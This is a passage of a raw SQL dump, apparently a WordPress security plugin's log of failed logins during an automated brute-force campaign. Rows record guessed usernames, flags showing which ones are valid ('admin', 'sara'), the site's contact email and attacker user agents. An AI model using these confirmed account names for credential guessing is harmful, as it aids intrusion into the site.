Safari/537.36'),(1244,4985,1694983029.407901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0b','Mozilla/5.0 (Linux; Android 8.1.0; LML212VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36'),(1245,4995,1694984846.037376,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\01','Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(1246,4996,1694984850.688063,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Linux; Android 10; Nokia C2 Tennen) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(1247,4999,1694985231.472245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(1248,5003,1694986661.031159,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0B^}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(1249,5005,1694986665.250962,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1250,5011,1694986681.576289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0{8ED','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1251,5011,1694986681.588663,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0{8ED','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1252,5012,1694986682.181387,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0B^}','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),(1253,5013,1694986682.655963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),(1254,5016,1694987533.105068,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(1255,5018,1694987809.182233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Linux; Android 11; SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(1256,5019,1694988196.239354,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (Linux; Android 9; LM-Q710.FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(1257,5027,1694991291.453803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1258,5037,1694994768.695735,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\03OQb','Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(1259,5038,1694994769.097135,1,'loginFailValidUsername','admin',1,'*G\0=\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(1260,5039,1694994769.854344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ڣI','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(1261,5040,1694994771.814892,1,'loginFailInvalidUsername','12345678',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1262,5040,1694994771.824420,1,'loginFailInvalidUsername','12345678',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1263,5044,1694994782.711345,1,'loginFailInvalidUsername','xstructiep88',0,'\0\0\0\0\0\0\0\0\0\0+Ʊ','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1264,5045,1694994783.974442,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0s','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),(1265,5051,1694994805.197432,1,'loginFailInvalidUsername','AnonymousFox',0,'\0\0\0\0\0\0\0\0\0\0/) ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(1266,5052,1694994809.834436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QG','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'),(1267,5055,1694996063.056726,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1268,5060,1694997904.031475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kݣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1269,5060,1694997904.045020,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kݣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1270,5081,1695002065.803491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0kC','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1271,5083,1695003005.075213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0O','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),(1272,5086,1695003018.460442,1,'loginFailInvalidUsername','123456789',0,'\0\0\0\0\0\0\0\0\0\0Yk9','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(1273,5086,1695003018.471765,1,'loginFailInvalidUsername','123456789',0,'\0\0\0\0\0\0\0\0\0\0Yk9','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(1274,5089,1695003027.227357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),(1275,5090,1695003028.266807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0wn','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(1276,5091,1695003030.864426,1,'loginFailInvalidUsername','admin919',0,'\0\0\0\0\0\0\0\0\0\08j','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(1277,5093,1695003044.976791,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0{8ED','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),(1278,5099,1695003997.786595,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1279,5103,1695005430.532179,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0H(Z','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(1280,5112,1695009603.949678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1281,5131,1695014737.005304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),(1282,5140,1695016473.550086,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1283,5148,1695019635.365955,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1284,5154,1695021309.965587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1285,5155,1695021542.801248,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0s','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'),(1286,5156,1695021543.847577,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0'),(1287,5157,1695021546.134547,1,'loginFailInvalidUsername','bunyawee',0,'\0\0\0\0\0\0\0\0\0\0g\\ ','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1288,5158,1695021550.984580,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0O','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(1289,5159,1695021551.750216,1,'loginFailValidUsername','Admin',1,'*G\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(1290,5160,1695021554.400620,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0Dm','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1291,5162,1695021564.048679,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0{8ED','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),(1292,5163,1695021566.522163,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0Ɗ','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(1293,5167,1695022244.085225,1,'loginFailValidUsername','sara',2,'*G\0\0\0\0\0\0\0\0\0\0!','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(1294,5177,1695024586.629191,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1295,5188,1695029119.487818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D#|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1296,5188,1695029119.508895,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D#|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1297,5191,1695030234.946019,1,'loginFailInvalidUsername','alimirah5454',0,'\0\0\0\0\0\0\0\0\0\0/X','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),(1298,5192,1695030237.153292,1,'loginFailInvalidUsername','apitz',0,'\0\0\0\0\0\0\0\0\0\0lj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(1299,5196,1695030248.594148,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Yk9','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(1300,5197,1695030258.015358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0f}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),(1301,5198,1695030260.061660,1,'loginFailInvalidUsername','manager',0,'\0\0\0\0\0\0\0\0\0\0M','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),(1302,5199,1695030268.512069,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z$','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),(1303,5201,1695030272.498393,1,'loginFailInvalidUsername','1',0,'\0\0\0\0\0\0\0\0\0\0V\0','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0'),(1304,5202,1695030276.094293,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0ڣI','Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(1305,5203,1695030281.318033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(1306,5205,1695030303.487384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g\'','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),(1307,5210,1695033909.378684,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\'e','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(1308,5219,1695038124.863690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1309,5220,1695038691.195095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1310,5224,1695039788.939349,1,'loginFailValidUsername','admin',1,'*G\0=\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(1311,5224,1695039788.954226,1,'loginFailValidUsername','admin',1,'*G\0=\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(1312,5227,1695039914.149886,1,'loginFailInvalidUsername','prueba',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(1313,5229,1695039923.391238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g$','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1314,5231,1695039938.678106,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0s','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0'),(1315,5232,1695039941.816539,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ]','Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(1316,5239,1695041410.156850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1317,5268,1695053342.594096,1,'loginFailInvalidUsername','teste',0,'\0\0\0\0\0\0\0\0\0\0gt<','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0'),(1318,5269,1695053343.964555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0HӦ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(1319,5270,1695053352.414040,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0ϴr','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(1320,5271,1695053355.484395,1,'loginFailInvalidUsername','famous',0,'\0\0\0\0\0\0\0\0\0\03^$','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(1321,5272,1695053357.503300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0bl','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(1322,5273,1695053360.408136,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-v[','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(1323,5275,1695053365.374462,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0W','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(1324,5283,1695057847.454914,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0д','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(1325,5287,1695060615.022897,1,'loginFailInvalidUsername','developer',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(1326,5288,1695060620.825399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05U','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1327,5292,1695060644.555767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05U','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1328,5293,1695060647.674268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1329,5294,1695060652.226717,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0/X','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0'),(1330,5297,1695060659.726040,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\05U','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),(1331,5299,1695060671.546666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05U','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),(1332,5300,1695060674.487096,1,'loginFailInvalidUsername','demo1',0,'\0\0\0\0\0\0\0\0\0\0f}','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(1333,5304,1695062433.405300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1334,5314,1695069224.711740,1,'loginFailInvalidUsername','admin2022',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0'),(1335,5318,1695069234.462555,1,'loginFailInvalidUsername','wwwadm',0,'\0\0\0\0\0\0\0\0\0\0{l','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(1336,5320,1695069245.361853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0;j','Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1337,5321,1695069246.560034,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0{l','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),(1338,5323,1695069252.640445,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0HӦ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(1339,5334,1695073603.852443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Linux; Android 12; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(1340,5335,1695074034.048714,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0|^[','Mozilla/5.0 (Linux; Android 12; Pixel 5a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(1341,5342,1695076876.694059,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0g1','Mozilla/5.0 (Linux; Android 11; SM-G998U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(1342,5343,1695077241.202530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1343,5352,1695081695.627686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_ٓ','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),(1344,5354,1695081699.606271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0{-J','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(1345,5356,1695081703.606360,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1346,5357,1695081710.871078,1,'loginFailInvalidUsername','wordpress',0,'\0\0\0\0\0\0\0\0\0\0g$\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(1347,5359,1695081715.339314,1,'loginFailInvalidUsername','ferrimet',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1348,5360,1695081719.528497,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0e`','Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1349,5361,1695081720.014625,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),(1350,5362,1695081722.066483,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0/d','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(1351,5363,1695081726.650038,1,'loginFailInvalidUsername','aaa',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),(1352,5364,1695081739.534328,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0/d','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(1353,5387,1695091014.137016,1,'loginFailInvalidUsername','adminpiotr',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0'),(1354,5390,1695091035.274041,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),(1355,5392,1695091035.727371,1,'loginFailValidUsername','Admin',1,'*x\0\0\0\0\0\0\0h','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),(1356,5395,1695091057.122136,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1357,5405,1695097890.707207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0»','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1358,5407,1695098826.844849,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1359,5410,1695100789.549134,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(1360,5414,1695100797.007444,1,'loginFailInvalidUsername','shahin98',0,'\0\0\0\0\0\0\0\0\0\0|s','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 